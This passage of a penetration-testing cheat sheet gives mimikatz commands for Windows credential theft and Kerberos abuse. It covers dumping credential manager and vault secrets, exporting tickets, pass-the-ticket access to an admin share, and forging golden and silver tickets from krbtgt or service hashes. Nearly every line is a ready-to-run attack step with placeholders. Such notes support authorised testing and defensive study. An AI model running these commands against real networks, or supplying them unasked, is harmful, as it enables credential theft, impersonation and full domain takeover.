```bash
privilege::debug
sekurlsa::credman
# or
privilege::debug
vault::cred
```

# Dump Tickets

```powershell
# you will need to run the command prompt as an administrator
# this will export all of the .kirbi tickets into the directory that you are in
# or you can also use the base64 encoded tickets from Rubeus
# when looking for which ticket to impersonate, it is recommended to look for an administrator ticket from the krbtgt
.\mimikatz
privilege::debug
sekurlsa::tickets /export
```

# Pass the Ticket

```powershell
.\mimikatz.exe
# the command will cache and impersonate the given ticket
kerberos::ptt <ticket>
# verify that we successfully impersonated the ticket by listing our cached tickets
klist
# verify that you can look at the admin share
dir \\<IP>\admin$
```

# Golden / Silver Ticket Attack

```powershell
# Golden ticket
.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /krbtgt:<NTLM> /id:500

# Silver ticket
.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:<service_account>
kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /rc4:<NTLM> /id:1105
# OR
kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /rc4:<NTLM> /id:1105 /ptt
misc::cmd
```